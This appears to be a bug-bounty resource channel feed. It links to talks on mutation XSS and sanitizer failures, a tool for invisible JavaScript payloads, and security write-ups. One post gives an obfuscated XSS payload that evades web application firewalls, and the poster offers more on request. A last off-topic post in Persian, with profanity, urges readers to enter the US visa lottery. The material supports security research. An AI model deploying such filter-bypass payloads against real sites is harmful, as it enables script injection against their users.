MXSS Explained Part 1: Why Server-Side HTML Sanitizers Are Doomed to Fail with this XSS!
https://youtu.be/aczTceXp49U?si=t6mJ5NEOioD0i9XK
https://youtu.be/aczTceXp49U?si=t6mJ5NEOioD0i9XK
YouTube
MXSS Explained: Server Side HTML Sanitizers are Doomed to Fail with this XSS!
XSS has been around forever, but Mutation XSS (MXSS) makes it even trickier to stop even with all the defenses! In this video, we’ll break down why server-side sanitizers keep failing when it comes to handling browser quirks and parsing inconsistencies. From…
❤2
MXSS Part 2: Why Client-Side HTML Sanitization is hard
https://youtu.be/vVwo5tW6d3w?si=6Q-daqfd_F8Mwh7z
https://youtu.be/vVwo5tW6d3w?si=6Q-daqfd_F8Mwh7z
YouTube
MXSS Part 2: Why Client-Side HTML Sanitization is hard
Sanitizing HTML is harder than it seems with MXSS! In the last video, we talked about the challenges of server-side sanitization, and now we’re diving into why client-side sanitization is just as difficult. We'll break down the issues, including the round…
❤1
Invisible JavaScript, an online tool to generate invisible payloads
https://benjaminaster.com/invisible-javanoscript/
reference: https://x.com/benjamin_aster/status/1845191766040809870?s=46
#waf_bypass #XSS #javanoscript
https://benjaminaster.com/invisible-javanoscript/
reference: https://x.com/benjamin_aster/status/1845191766040809870?s=46
#waf_bypass #XSS #javanoscript
Benjaminaster
Invisible JavaScript
Execute invisible JavaScript by abusing Hangul filler characters.
❤3
https://medium.com/greenwolf-security/linting-for-bugs-vulnerabilities-49bc75a61c6 || Old but still practical and can give some great results if it gets customized
Medium
Linting For Bugs & Vulnerabilities
An Introductory Guide for finding Bugs with JavaScript Static Analysis
👍2
BugBounty & Hacking Resources
XSS payload (waf bypass) alert(origin): W=!![];H=(W+"")[3];di="al";me="rt";qq="( origin )";meydi=di+H+me+qq;[]["fill"]["constructor"](meydi)() #xss #waf
If you need a specific payload for certain conditions, leave a comment. Also, I have a WAF bypass for situations where only uppercase is allowed, and JSFuck doesn’t work. If you'd like me to share that, Let me know🙂
❤1
BugBounty & Hacking Resources
Attacking Secondary Contexts in Web Applications.pdf
samcurry.net
Hacking Starbucks and Accessing Nearly 100 Million Customer Records
After a long day of trying and failing to find vulnerabilities on the Verizon Media bug bounty program I decided to call it quits and do some chores. I needed to buy gifts for a friends birthday and went online to order a Starbucks gift card.
❤1
https://www.youtube.com/playlist?list=PL9fPq3eQfaaB2scbXRczwvjVH0ckX4bwt
The DEF CON 32 Playlist is filled with extensive, high-quality content, offering a deep dive into cutting-edge hacking research and techniques.
The DEF CON 32 Playlist is filled with extensive, high-quality content, offering a deep dive into cutting-edge hacking research and techniques.
YouTube
DEF CON 32 Main Stage Talks
Share your videos with friends, family, and the world
❤1
https://dvprogram.state.gov
برید لاتاری ثبت نام کنید شاید شانستون گرفت از این خراب شده کشیدین بیرون
fuck other countries
برید لاتاری ثبت نام کنید شاید شانستون گرفت از این خراب شده کشیدین بیرون
fuck other countries
💯5❤1